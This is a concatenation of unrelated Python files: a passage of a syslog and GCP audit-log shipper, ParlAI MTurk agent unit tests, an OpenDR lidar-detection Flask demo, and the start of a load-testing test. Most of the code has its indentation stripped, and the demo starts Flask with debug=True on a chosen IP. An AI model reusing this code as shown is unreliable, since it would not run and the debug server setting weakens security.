pos = json.load(pfr)
logger.debug('history loaded..')
except Exception as erred:
logger.debug(erred)
pos = {}
else:
pos = {}
self.read_content(pos, self.source_loc)
def read_content(self, pos1, source_loc1):
"""Read the SysLog file contents."""
while not self.killed:
new_content = False
# expand and validate source_loc1 with os type and file types and wildcards
for file in self.get_files(source_loc1):
try:
# pylint: disable=R1732
if (file in pos1 and pos1[file] == 'error') or ("\0" in open(file).read(512)):
continue
with open(file) as content_file:
# MD5 is used here to determine position only.
header = hashlib.md5(content_file.read(512).encode('utf-8')).hexdigest() # nosec
with open(file) as file_handle:
mapped = mmap.mmap(file_handle.fileno(), 0, prot=mmap.PROT_READ) # pylint: disable=I1101
if header not in pos1:
pos1[header] = mapped.tell()
else:
mapped.seek(pos1[header])
while True:
line = mapped.readline()
if not line:
break
pos1[header] = mapped.tell()
new_content = True
self.ingest_event(line.decode('utf-8'), file)
except Exception as erred:
pos1[file] = 'error'
logger.debug("%s : %s", str(file), str(erred))
continue
if new_content:
logger.debug('updating data...')
self.write_inv(pos1)
time.sleep(0.1)
@staticmethod
def get_files(source_loc2):
"""Retrieve the files from the log content.
Validate and expand by wildcard and OS type.
"""
files = glob.glob(source_loc2+'/**', recursive=True)
return [f for f in files if os.path.isfile(f)]
def ingest_event(self, event1, file1):
"""Ingest the parsed event."""
event2 = {"@rawstring": event1, "#source": file1, "#host": hostname}
return self.http.request("POST",
self.dest_url,
body=json.dumps(event2),
headers={
"Content-Type": "text/plain",
"charset": "utf-8",
"Authorization": f"Bearer {self.dest_token}"
}
)
def write_inv(self, pos2):
"""Store our position in the file."""
with open(self.name, 'w') as pfw:
json.dump(pos2, pfw)
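    # The position file written above is a flat JSON object mapping the MD5 of
    # a file's first 512 bytes to the last byte offset read, with problem
    # files keyed by path and flagged as "error", e.g. (illustrative):
    #
    #   {"<md5-of-first-512-bytes>": 10432, "/var/log/unreadable.bin": "error"}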
def kill(self):
"""Set the kill flag."""
self.killed = True
class GCPAuditLog(threading.Thread):
"""Class to represent a GCP audit log connection."""
def __init__(self,
proj_id,
sub_id,
cred_path,
dest_url,
dest_token,
name="gcp-audit-log"
):
"""Initialize the GCP Audit object."""
threading.Thread.__init__(self)
self.name = name
self.proj_id = proj_id
self.sub_id = sub_id
self.cred_path = cred_path
self.dest_url = dest_url
self.dest_token = dest_token
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = self.cred_path
self.subscriber = pubsub_v1.SubscriberClient()
self.sub_path = self.subscriber.subscription_path(self.proj_id, self.sub_id)
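        # subscription_path() yields the fully-qualified subscription name,
        # i.e. "projects/<project_id>/subscriptions/<subscription_id>".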
self.http = urllib3.PoolManager()
self.killed = False
    def callback(self, message: pubsub_v1.subscriber.message.Message):
        """Handle callbacks to ingest event."""
        # Process each Pub/Sub message once and acknowledge it; looping here
        # would re-send the same payload until the thread is killed.
        if not self.killed:
            self.ingest_event(message.data)
            message.ack()
def run(self):
"""Run the connector and set the trace."""
sys.settrace(self.globaltrace)
# timeout = 5.0
logger.debug("Starting %s", self.name)
streaming_pull_future = self.subscriber.subscribe(self.sub_path, callback=self.callback)
logger.debug("Listening for messages on %s", self.sub_path)
with self.subscriber:
time.sleep(5)
try:
streaming_pull_future.result()
except TimeoutError:
streaming_pull_future.cancel()
streaming_pull_future.result()
except KeyboardInterrupt:
streaming_pull_future.cancel()
sys.exit(1)
except Exception as erred:
logger.debug(erred.args[0])
sys.exit(1)
def globaltrace(self, frame, event, arg): # pylint: disable=W0613
"""Return the local trace for `call` events."""
returned = None
if event == 'call':
returned = self.localtrace
return returned
def localtrace(self, frame, event, arg): # pylint: disable=W0613
"""Raise SystemExit on the next line called."""
if self.killed:
if event == 'line':
raise SystemExit("Thread quitting")
return self.localtrace
def ingest_event(self, event1):
"""Ingest the parsed event."""
# auth_token = ' Bearer '+self.dest_token
return self.http.request("POST",
self.dest_url,
body=event1,
headers={"Content-Type": "application/json", "Authorization": f"Bearer {self.dest_token}"}
)
def kill(self):
"""Set the kill flag."""
self.killed = True
class GracefulShutdown:
"""Class to handle graceful shutdown."""
shutdown = False
def __init__(self):
"""Initialize the class and set the exit handlers."""
signal.signal(signal.SIGINT, self.graceful_shutdown)
signal.signal(signal.SIGTERM, self.graceful_shutdown)
def graceful_shutdown(self, *args): # pylint: disable=W0613
"""Set the shutdown flag."""
self.shutdown = True
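# Illustrative logshipper.conf layout (keys inferred from the option lookups
# in the __main__ block below; every value is a placeholder, and a section
# only needs the keys its source_type actually reads — aws-cloudtrail and
# gcp-audit-log sections follow the same pattern with their own keys):
#
#   [fdr-feed]
#   source_type = crwd-fdr
#   access_key = <aws-access-key-id>
#   secret_key = <aws-secret-access-key>
#   sqs_queue_url = <sqs-queue-url>
#   region = <aws-region>
#   dest_url = <humio-ingest-url>
#   dest_token = <humio-ingest-token>
#
#   [local-syslog]
#   source_type = syslog
#   source_location = /var/log
#   source_category = folder
#   dest_type = <destination-type>
#   dest_url = <humio-ingest-url>
#   dest_token = <humio-ingest-token>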
if __name__ == "__main__":
threads = []
try:
config = configparser.ConfigParser()
config.read("logshipper.conf")
for i in config.sections():
logger.debug("**** Section: %s ****", i)
logger.debug(config.items(i))
if config[i]["source_type"] == "crwd-fdr":
thread1 = FDR2Humio(config[i]["access_key"], config[i]["secret_key"], config[i]["sqs_queue_url"],
config[i]["region"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread1.daemon = True
thread1.start()
threads.append([thread1, "crwd-fdr"])
if config[i]["source_type"] == "aws-cloudtrail":
thread1 = CloudTrail(config[i]["access_key"], config[i]["secret_key"], config[i]["sqs_queue_url"],
config[i]["region"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread1.daemon = True
thread1.start()
threads.append([thread1, "aws-cloudtrail"])
if config[i]["source_type"] == "crwd-siem-connector":
thread2 = SIEMConnector(config[i]["source_location"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread2.daemon = True
thread2.start()
threads.append([thread2, "crwd-siem-connector"])
if config[i]["source_type"] == "syslog":
thread3 = Syslog(config[i]["source_location"], config[i]["source_category"], config[i]
["dest_type"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread3.daemon = True
thread3.start()
threads.append([thread3, "syslog"])
if config[i]["source_type"] == "gcp-audit-log":
thread4 = GCPAuditLog(config[i]["project_id"], config[i]["subscription_id"], config[i]
["credential_path"], config[i]["dest_url"], config[i]["dest_token"], name=i)
thread4.daemon = True
thread4.start()
threads.append([thread4, "gcp-audit-log"])
except configparser.NoOptionError as err:
raise SystemExit(f"No option error.\n{err}") from err
except Exception as err:
raise SystemExit(err) from err
shipper = GracefulShutdown()
while not shipper.shutdown:
# Check thread status
# for thread in threads:
# if not thread[0].isAlive():
# # restart thread
time.sleep(2)
for running_thread in threads:
running_thread[0].kill()
running_thread[0].join()
        if not running_thread[0].is_alive():
print("Thread killed.")
print("Process shutdown.")
|
test_mturk_agent.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import unittest
import os
import time
import threading
from unittest import mock
from parlai.mturk.core.agents import MTurkAgent, AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.worker_manager as WorkerManagerFile
import parlai.mturk.core.data_model as data_model
parent_dir = os.path.dirname(os.path.abspath(__file__))
WorkerManagerFile.DISCONNECT_FILE_NAME = 'disconnect-test.pickle'
WorkerManagerFile.MAX_DISCONNECTS = 1
WorkerManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_MESSAGE
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE, AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING, AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE, AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED, AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
class TestAssignState(unittest.TestCase):
"""Various unit tests for the AssignState class"""
def setUp(self):
self.agent_state1 = AssignState()
self.agent_state2 = AssignState(status=AssignState.STATUS_IN_TASK)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt,
mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
def tearDown(self):
self.mturk_manager.shutdown()
def test_assign_state_init(self):
'''Test proper initialization of assignment states'''
self.assertEqual(self.agent_state1.status, AssignState.STATUS_NONE)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(self.agent_state2.status, AssignState.STATUS_IN_TASK)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
def test_message_management(self):
'''Test message management in an AssignState'''
# Ensure message appends succeed and are idempotent
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 1)
self.agent_state1.append_message(MESSAGE_2)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.assertEqual(len(self.agent_state2.get_messages()), 0)
self.assertIn(MESSAGE_1, self.agent_state1.get_messages())
self.assertIn(MESSAGE_2, self.agent_state1.get_messages())
self.assertEqual(len(self.agent_state1.message_ids), 2)
self.agent_state2.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state2.message_ids), 1)
# Ensure command interactions work as expected
self.agent_state1.set_last_command(COMMAND_1)
self.assertEqual(self.agent_state1.get_last_command(), COMMAND_1)
# Ensure clearing messages acts as intended and doesn't clear agent2
self.agent_state1.clear_messages()
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(len(self.agent_state2.message_ids), 1)
def test_state_handles_status(self):
'''Ensures status updates and is_final are valid'''
for status in statuses:
self.agent_state1.set_status(status)
self.assertEqual(self.agent_state1.get_status(), status)
for status in active_statuses:
self.agent_state1.set_status(status)
self.assertFalse(self.agent_state1.is_final())
for status in complete_statuses:
self.agent_state1.set_status(status)
self.assertTrue(self.agent_state1.is_final())
# TODO update the below once bonus is default
for status in complete_statuses:
self.agent_state1.set_status(status)
text, command = self.agent_state1.get_inactive_command_text()
self.assertIsNotNone(text)
self.assertIsNotNone(command)
class TestMTurkAgent(unittest.TestCase):
"""Various unit tests for the MTurkAgent class"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt.copy(),
mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
self.turk_agent = MTurkAgent(
self.opt.copy(), self.mturk_manager,
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1, TEST_WORKER_ID_1)
def tearDown(self):
self.mturk_manager.shutdown()
disconnect_path = os.path.join(parent_dir, 'disconnect-test.pickle')
if os.path.exists(disconnect_path):
os.remove(disconnect_path)
def test_init(self):
'''Test initialization of an agent'''
self.assertIsNotNone(self.turk_agent.creation_time)
self.assertIsNone(self.turk_agent.id)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertIsNone(self.turk_agent.conversation_id)
self.assertFalse(self.turk_agent.some_agent_disconnected)
self.assertFalse(self.turk_agent.hit_is_expired)
self.assertFalse(self.turk_agent.hit_is_abandoned)
self.assertFalse(self.turk_agent.hit_is_returned)
self.assertFalse(self.turk_agent.hit_is_complete)
self.assertFalse(self.turk_agent.disconnected)
self.assertTrue(self.turk_agent.alived)
def test_state_wrappers(self):
'''Test the mturk agent wrappers around its state'''
for status in statuses:
self.turk_agent.set_status(status)
self.assertEqual(self.turk_agent.get_status(), status)
for status in [
AssignState.STATUS_DONE,
AssignState.STATUS_PARTNER_DISCONNECT
]:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.submitted_hit())
for status in active_statuses:
self.turk_agent.set_status(status)
self.assertFalse(self.turk_agent.is_final())
for status in complete_statuses:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.is_final())
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 1)
self.turk_agent.append_message(MESSAGE_2)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.assertIn(MESSAGE_1, self.turk_agent.get_messages())
self.assertIn(MESSAGE_2, self.turk_agent.get_messages())
# Ensure command interactions work as expected
self.turk_agent.set_last_command(COMMAND_1)
self.assertEqual(self.turk_agent.get_last_command(), COMMAND_1)
self.turk_agent.clear_messages()
self.assertEqual(len(self.turk_agent.get_messages()), 0)
# In task checks
self.turk_agent.conversation_id = 't_12345'
self.assertTrue(self.turk_agent.is_in_task())
self.turk_agent.conversation_id = 'b_12345'
self.assertFalse(self.turk_agent.is_in_task())
def test_connection_id(self):
'''Ensure the connection_id hasn't changed'''
connection_id = "{}_{}".format(
self.turk_agent.worker_id, self.turk_agent.assignment_id)
self.assertEqual(self.turk_agent.get_connection_id(), connection_id)
def test_inactive_data(self):
'''Ensure data packet generated for inactive commands is valid'''
for status in complete_statuses:
self.turk_agent.set_status(status)
data = self.turk_agent.get_inactive_command_data()
self.assertIsNotNone(data['text'])
self.assertIsNotNone(data['inactive_text'])
self.assertEqual(
data['conversation_id'], self.turk_agent.conversation_id)
self.assertEqual(data['agent_id'], TEST_WORKER_ID_1)
def test_status_change(self):
has_changed = False
self.turk_agent.set_status(AssignState.STATUS_ONBOARDING)
def wait_for_status_wrap():
nonlocal has_changed # noqa 999 we don't use python2
self.turk_agent.wait_for_status(AssignState.STATUS_WAITING)
has_changed = True
t = threading.Thread(target=wait_for_status_wrap, daemon=True)
t.start()
self.assertFalse(has_changed)
time.sleep(0.07)
self.assertFalse(has_changed)
self.turk_agent.set_status(AssignState.STATUS_WAITING)
time.sleep(0.07)
self.assertTrue(has_changed)
def test_message_queue(self):
'''Ensure observations and acts work as expected'''
self.mturk_manager.send_message = mock.MagicMock()
self.turk_agent.observe(ACT_1)
self.mturk_manager.send_message.assert_called_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1, ACT_1)
# First act comes through the queue and returns properly
self.assertTrue(self.turk_agent.msg_queue.empty())
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.recieved_packets[MESSAGE_ID_1])
self.assertFalse(self.turk_agent.msg_queue.empty())
returned_act = self.turk_agent.get_new_act_message()
self.assertEqual(returned_act, ACT_1)
# Repeat act is ignored
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.msg_queue.empty())
for i in range(100):
self.turk_agent.put_data(str(i), ACT_1)
self.assertEqual(self.turk_agent.msg_queue.qsize(), 100)
self.turk_agent.flush_msg_queue()
self.assertTrue(self.turk_agent.msg_queue.empty())
# Test non-act messages
blank_message = self.turk_agent.get_new_act_message()
self.assertIsNone(blank_message)
self.turk_agent.disconnected = True
disconnect_message = self.turk_agent.get_new_act_message()
self.turk_agent.disconnected = False
self.assertEqual(disconnect_message['text'],
self.turk_agent.MTURK_DISCONNECT_MESSAGE)
self.turk_agent.hit_is_returned = True
return_message = self.turk_agent.get_new_act_message()
self.assertEqual(
return_message['text'], self.turk_agent.RETURN_MESSAGE)
self.turk_agent.hit_is_returned = False
# Reduce state
self.turk_agent.reduce_state()
self.assertIsNone(self.turk_agent.msg_queue)
self.assertIsNone(self.turk_agent.recieved_packets)
def test_message_acts(self):
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
# non-Blocking check
self.assertIsNone(self.turk_agent.message_request_time)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertEqual(returned_act, ACT_1)
self.mturk_manager.send_command.assert_called_once()
# non-Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
while returned_act is None:
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(
returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
# Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(
returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
if __name__ == '__main__':
unittest.main(buffer=True)
|
demo.py
|
# Copyright 2020-2021 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import os
import argparse
import threading
import time
import numpy as np
import cv2
from flask import Flask, Response, render_template, request
# OpenDR imports
from opendr.perception.object_detection_3d import VoxelObjectDetection3DLearner
from data_generators import (
lidar_point_cloud_generator,
disk_point_cloud_generator,
)
from draw_point_clouds import (
draw_point_cloud_bev,
draw_point_cloud_projected_numpy,
)
TEXT_COLOR = (255, 112, 255) # B G R
# Initialize the output frame and a lock used to ensure thread-safe
# exchanges of the output frames (useful when multiple browsers/tabs
# are viewing the stream)
output_frame = None
lock = threading.Lock()
point_cloud_generator = None
keys_pressed = []
lidar_type = "velodyne"
# initialize a flask object
app = Flask(__name__)
def rplidar(*args, **kwargs):
from rplidar_processor import RPLidar
return RPLidar(*args, **kwargs)
def o3mlidar(*args, **kwargs):
from o3m_lidar.o3m_lidar import O3MLidar
return O3MLidar(*args, **kwargs)
@app.route("/")
def index():
# return the rendered template
return render_template("index.html")
def running_fps(alpha=0.1):
    """Return a closure tracking an exponential moving average of the FPS."""
    t0 = time.time()
    fps_avg = 10
    def wrapped():
        nonlocal t0, alpha, fps_avg
        t1 = time.time()
        delta = t1 - t0
        t0 = t1
        # Exponential moving average of the instantaneous frame rate 1/delta.
        fps_avg = alpha * (1 / delta) + (1 - alpha) * fps_avg
        return fps_avg
    return wrapped
def draw_fps(frame, fps):
cv2.putText(
frame,
f"{fps:.1f} FPS",
(10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX,
1,
TEXT_COLOR,
1,
)
def draw_dict(frame, values, scale=5):
    i = 0
    for k, v in values.items():
cv2.putText(
frame,
f"{k}: {v}",
(10, frame.shape[0] - 10 - 30 * scale * i),
cv2.FONT_HERSHEY_SIMPLEX,
scale,
TEXT_COLOR,
scale,
)
i += 1
def stack_images(images, mode="horizontal"):
max_width, max_height = 0, 0
for image in images:
width, height, _ = image.shape
max_width = max(max_width, width)
max_height = max(max_height, height)
if mode == "horizontal":
for i in range(len(images)):
width, _, _ = images[i].shape
delta = max_width - width
pad = delta // 2
images[i] = np.pad(
images[i], [(pad, pad + delta % 2), (0, 0), (0, 0)]
)
return cv2.hconcat(images)
elif mode == "vertical":
for i in range(len(images)):
_, height, _ = images[i].shape
delta = max_height - height
pad = delta // 2
images[i] = np.pad(
images[i], [(0, 0), (pad, pad + delta % 2), (0, 0)]
)
return cv2.vconcat(images)
def voxel_object_detection_3d(config_path, model_name=None):
global point_cloud_generator, output_frame, lock, lidar_type
with lock:
output_frame = np.zeros((400, 400, 3), dtype=np.uint8)
draw_dict(output_frame, {"Loading": "model"}, 1)
# Prep stats
    fps = running_fps()
predict = model_name is not None and model_name != "None"
if predict:
# Init model
detection_learner = VoxelObjectDetection3DLearner(config_path)
if model_name is not None and not os.path.exists(
"./models/" + model_name
):
detection_learner.download(model_name, "./models")
detection_learner.load("./models/" + model_name, verbose=True)
print("Learner created")
else:
detection_learner = None
def process_key(key):
nonlocal tvec, rvec, fx, fy
dt = 1.2
dr = math.pi / 10
if key == 2:
tvec += np.array([0.00, dt, 0.00], dtype=np.float32)
elif key == 3:
tvec += np.array([-dt, 0.00, 0.00], dtype=np.float32)
elif key == 0:
tvec += np.array([0.00, -dt, 0.00], dtype=np.float32)
elif key == 1:
tvec += np.array([dt, 0.00, 0.00], dtype=np.float32)
if key == 4:
rvec += np.array([0.00, dr, 0.00], dtype=np.float32)
elif key == 5:
rvec += np.array([-dr, 0.00, 0.00], dtype=np.float32)
elif key == 6:
rvec += np.array([0.00, -dr, 0.00], dtype=np.float32)
elif key == 7:
rvec += np.array([dr, 0.00, 0.00], dtype=np.float32)
elif key == 8:
rvec += np.array([0.00, 0.00, -dr], dtype=np.float32)
elif key == 9:
rvec += np.array([0.00, 0.00, dr], dtype=np.float32)
elif key == 10:
fx /= 1.5
elif key == 11:
fx *= 1.5
elif key == 12:
fy /= 1.5
elif key == 13:
fy *= 1.5
elif key == 14:
tvec += np.array([0.00, 0.00, dt], dtype=np.float32)
elif key == 15:
tvec += np.array([0.00, 0.00, -dt], dtype=np.float32)
elif key == 98:
tvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
elif key == 99:
rvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
elif key == 100:
tvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
rvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
fx = 10
fy = 10
if lidar_type == "velodyne":
xs = [-20, 90]
ys = [-50, 50]
scale = 20
image_size_x = 1000
image_size_y = 1000
font_scale = 4
tvec = np.array([10.8, 8.34, 16.8], dtype=np.float32)
rvec = np.array([-10.67, 26.69, 6.914], dtype=np.float32)
fx = 864.98
fy = 864.98
elif lidar_type == "rplidar":
xs = [-10, 10]
ys = [-10, 10]
scale = 30
image_size_x = 60
image_size_y = 6
tvec = np.array([10.8, 8.34, 16.8], dtype=np.float32)
rvec = np.array([-10.67, 26.69, 6.914], dtype=np.float32)
fx = 864.98
fy = 864.98
font_scale = 0.5
elif lidar_type == "o3mlidar":
xs = [-8, 8]
ys = [-8, 8]
scale = 40
image_size_x = 600
image_size_y = 600
font_scale = 1
tvec = np.array([4.8, 2.4, 13.2], dtype=np.float32)
rvec = np.array([-6.28, 15.39, 5.03], dtype=np.float32)
fx = 864.98
fy = 864.98
    else:
        xs = [-20, 90]
        ys = [-50, 50]
        scale = 20
        image_size_x = 1000
        image_size_y = 3000
        font_scale = 4
        # Fallback projection parameters so tvec/rvec/fx/fy are always bound
        # before the drawing loop below (the values are arbitrary defaults).
        tvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
        rvec = np.array([0.00, 0.00, 0.00], dtype=np.float32)
        fx = 864.98
        fy = 864.98
while True:
try:
t = time.time()
point_cloud = next(point_cloud_generator)
pc_time = time.time() - t
if len(point_cloud.data) <= 0:
continue
t = time.time()
if predict:
predictions = detection_learner.infer(point_cloud)
else:
predictions = []
if len(predictions) > 0:
print(
"found", len(predictions), "objects",
)
predict_time = time.time() - t
t = time.time()
frame_bev_2 = draw_point_cloud_bev(
point_cloud.data, predictions, scale, xs, ys
)
frame_proj_2 = draw_point_cloud_projected_numpy(
point_cloud.data,
predictions,
tvec=tvec,
rvec=rvec,
image_size_x=image_size_x,
image_size_y=image_size_y,
fx=fx,
fy=fy,
)
frame = frame_proj_2
frame = stack_images([frame, frame_bev_2], "horizontal")
draw_time = time.time() - t
total_time = pc_time + predict_time + draw_time
draw_dict(
frame,
{
"FPS": fps(),
"predict": str(int(predict_time * 100 / total_time)) + "%",
"get data": str(int(pc_time * 100 / total_time)) + "%",
"draw": str(int(draw_time * 100 / total_time)) + "%",
},
font_scale,
)
for key in keys_pressed:
process_key(key)
keys_pressed.clear()
with lock:
output_frame = frame.copy()
except FileExistsError as e:
print(e)
def generate():
# grab global references to the output frame and lock variables
global output_frame, lock
# loop over frames from the output stream
while True:
# wait until the lock is acquired
with lock:
# check if the output frame is available, otherwise skip
# the iteration of the loop
if output_frame is None:
continue
# encode the frame in JPEG format
(flag, encodedImage) = cv2.imencode(".jpg", output_frame)
# ensure the frame was successfully encoded
if not flag:
continue
# yield the output frame in the byte format
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" +
bytearray(encodedImage) +
b"\r\n"
)
@app.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
return Response(
generate(), mimetype="multipart/x-mixed-replace; boundary=frame"
)
@app.route("/keypress", methods=["POST"])
def process_keypress():
global keys_pressed
data = request.get_json()
key = data["key"]
keys_pressed.append(key)
return ("", 204)
# check to see if this is the main thread of execution
if __name__ == "__main__":
# construct the argument parser and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument(
"-i", "--ip", type=str, required=True, help="IP address of the device"
)
ap.add_argument(
"-o",
"--port",
type=int,
required=True,
help="Ephemeral port number of the server (1024 to 65535)",
)
ap.add_argument(
"-mn",
"--model_name",
type=str,
default="None",
help="Pretrained model name",
)
ap.add_argument(
"-mc",
"--model_config",
type=str,
default="None",
help="Model configuration file",
)
ap.add_argument(
"-s", "--source", type=str, default="disk", help="Data source",
)
ap.add_argument(
"-dp",
"--data_path",
type=str,
default="",
help="Path for disk-based data generators",
)
ap.add_argument(
"-a",
"--algorithm",
type=str,
default="voxel",
help="Which algortihm to run",
choices=["voxel"],
)
ap.add_argument(
"-rpp",
"--rplidar_port",
type=str,
default="",
help="Port for RPLidar",
)
ap.add_argument(
"-o3mp",
"--o3m_port",
type=int,
default=42000,
help="Port for O3M Lidar",
)
ap.add_argument(
"-o3mip",
"--o3m_ip",
type=str,
default="0.0.0.0",
help="IP for O3M Lidar",
)
ap.add_argument(
"-o3mbs",
"--o3m_buffer_size",
type=int,
default=1460,
help="Buffer size for O3M Lidar",
)
args = vars(ap.parse_args())
point_cloud_generator = {
"disk": lambda: disk_point_cloud_generator(
args["data_path"], count=None
),
"rplidar": lambda: lidar_point_cloud_generator(
rplidar(args["rplidar_port"])
),
"o3mlidar": lambda: lidar_point_cloud_generator(
o3mlidar(
ip=args["o3m_ip"],
port=args["o3m_port"],
buffer_size=args["o3m_buffer_size"],
)
),
}[args["source"]]()
lidar_type = {
"disk": "velodyne",
"velodyne": "velodyne",
"rplidar": "rplidar",
"o3mlidar": "o3mlidar",
}[args["source"]]
algorithm = {"voxel": voxel_object_detection_3d}[args["algorithm"]]
# start a thread that will perform detection
t = threading.Thread(
target=algorithm, args=(args["model_config"], args["model_name"])
)
t.daemon = True
t.start()
# start the flask app
app.run(
host=args["ip"],
port=args["port"],
debug=True,
threaded=True,
use_reloader=False,
)
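# Illustrative invocation (paths and the model/config names are placeholders;
# -i/--ip and -o/--port are the only required arguments):
#
#   python3 demo.py -i 0.0.0.0 -o 8000 -s disk -dp <path-to-point-clouds> \
#       -mc <model-config-file> -mn <pretrained-model-name>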
|
test_hq.py
|
import os
import sys
import unittest
import shutil
import json
from multiprocessing import Process
from oct_turrets.turret import Turret
from oct_turrets.utils import load_file, validate_conf
from oct.utilities.run import run
from oct.utilities.commands import main
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
def run_turret():
"""Run a simple turret for testing the hq
"""
module = load_file(os.path.join(BASE_DIR, 'fixtures', 'v_user.py'))
config = validate_conf(os.path.join(BASE_DIR, 'fixtures', 'turret_config.json'))
turret = Turret(config, module)
turret.start()
def run_bad_turret():
module = load_file(os.path.join(BASE_DIR, 'fixtures', 'bad_user.py'))
config = validate_conf(os.path.join(BASE_DIR, 'fixtures', 'turret_config.json'))
turret = Turret(config, module)
turret.start()
